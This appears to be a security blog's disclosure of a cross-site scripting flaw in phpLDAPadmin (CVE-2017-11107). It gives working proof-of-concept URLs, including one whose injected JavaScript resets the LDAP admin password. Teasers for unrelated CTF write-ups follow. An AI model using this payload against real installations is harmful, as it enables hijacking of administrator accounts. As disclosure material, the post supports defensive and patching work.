Skip to main content

Hijacking phpLDAPadmin account using a Cross-site scripting vulnerability (CVE-2017-11107)

Software Description

phpLDAPadmin is an web-based LDAP adminstration interface for viewing and manipulating LDAP information.

Vulnerability Description

$request['form'] and $request['rdn'] parameters in file htdocs/entry_chooser.php aren't properly sanitized before being displayed to the user, which allows a remote attacker to inject arbitrary HTML/Javascript code in a user's context.

This vulnerability, if successfully exploited, can lead to data manipulation or information leakage as it is demonstrated in this PoC video.



Proof of Concept (PoC)


XSS via the 'form' parameter:

http://localhost:8888/phpldapadmin/entry_chooser.php?form=advanced_search_form%22).base;%27);}%20alert(1);%20function%20lol()%20{%20isNaN(%27&element=base&rdn=test

XSS via the 'rdn' parameter (needs Chrome's XSS Auditor bypass):

http://localhost:8888/phpldapadmin/entry_chooser.php?form=advanced_search_form&element=base&rdn=test%22%3E%3Cscript%3Ealert(1)%3C/script%3E

Changing admin password to '1337'


PAYLOAD : %22).base;%27);}%20var%20http=new%20XMLHttpRequest();%20var%20url=%22http://localhost:8888/phpldapadmin/cmd.php%22;%20var%20params=%22cmd%3Dupdate%2526server_id%3D1%2526dn%3Dcn%25253D<LOGIN_DN>%2526new_values%25255Buserpassword%25255D%25255B0%25255D%3D%25257BSSHA%25257Dxtzm0RhdgidTmNnRD0rvUdjCcGhPQgKa%22;%20http.open(%22POST%22,%20url,%20true);%20http.setRequestHeader(%22Content-type%22,%20%22application/x-www-form-urlencoded%22);%20http.send(params);%20function%20lol()%20{%20isNaN(%27

<LOGIN_DN> : Triple URL-Encoded login dn (Ex: cn%253Dadmin%252Cdc%253Dldap%252Cdc%253Dcom)

PoC URL:

http://localhost:8888/phpldapadmin/entry_chooser.php?form=advanced_search_form%22).base;%27);}%20var%20http=new%20XMLHttpRequest();%20var%20url=%22http://localhost:8888/phpldapadmin/cmd.php%22;%20var%20params=%22cmd%3Dupdate%2526server_id%3D1%2526dn%3Dcn%25253Dadmin%25252Cdc%25253Dldap%25252Cdc%25253Dcom%2526new_values%25255Buserpassword%25255D%25255B0%25255D%3D%25257BSSHA%25257Dxtzm0RhdgidTmNnRD0rvUdjCcGhPQgKa%22;%20http.open(%22POST%22,%20url,%20true);%20http.setRequestHeader(%22Content-type%22,%20%22application/x-www-form-urlencoded%22);%20http.send(params);%20function%20lol()%20{%20isNaN(%27&element=base&rdn=test

References

https://bugs.launchpad.net/ubuntu/+source/phpldapadmin/+bug/1701731
https://github.com/leenooks/phpLDAPadmin/issues/50

Comments

Post a Comment

Popular posts from this blog

Capture the Ether - Lotteries write-up

Capture the Ether is a "Capture the Flag" style game in which you hack Ethereum smart contracts to learn about security. Spoiler Alert ! In this write-up, I will go through the first four challenges in the category labeled "Lotteries". Each of these challenges has its own difficulty level and reward points. Basically you can solve them by "guessing?" the right value of a variable in a given smart contract. Guess the number The smart contract for this challenge looks like this: It has three functions : GuessTheNumberChallenge() : a payable constructor that tells you how much Ether is required when deploying the smart contract. isComplete() : it returns true when the smart contract's balance is equal to 0. guess(uint8 n) : It takes a uint8 as an argument and compares it with the variable declared in line 4. If the numbers are equal, you will have your Ethers sent back to your address. Note that this function is payable and req...
1 comment
Read more

CSAW CTF 2015 : Forensics 100 - Transfer write-up

Category : Forensics  Points : 100 Challenge Description : I was sniffing some web traffic for a while, I think I finally got something interesting. Help me find flag through all these packets. net_756d631588cb0a400cc16d1848a5f0fb.pcap Opening it up with Wireshark gives some few HTTP packets. After looking through those packets, I noticed that one of them contains the word FLAG. The start of the conversation contains a python script and some random padding at the end which was more likely to be the script's output. Looking through the python script we notice there is a variable called FLAG (censored) that gets encoded with Base64 then looped through one of the following ciphers ROT13, ROT3 and Base64 (randomly chosen).  One thing to mention is that the script keeps the cipher index attached to the encrypted string, this will make it easier for us to reverse the whole thing. I wrote a quick python script to do the decryption : Ex...
Post a Comment
Read more

SU-CTF write-up - steganography 100 challenge

Category : Steganography Points : 100 The description of the challenge was: Hear With Your Eyes In this challenge, we were given a wav file which we somehow had to decrypt to get the flag. This was a pretty easy one to be honest. After hearing the audio, the first thing that came up to my mind was to use a signal analyser. For this matter I used baudline. The output was as follow : The flag was : e5353bb7b575578bd4da1c898a8e2d7667
Post a Comment
Read more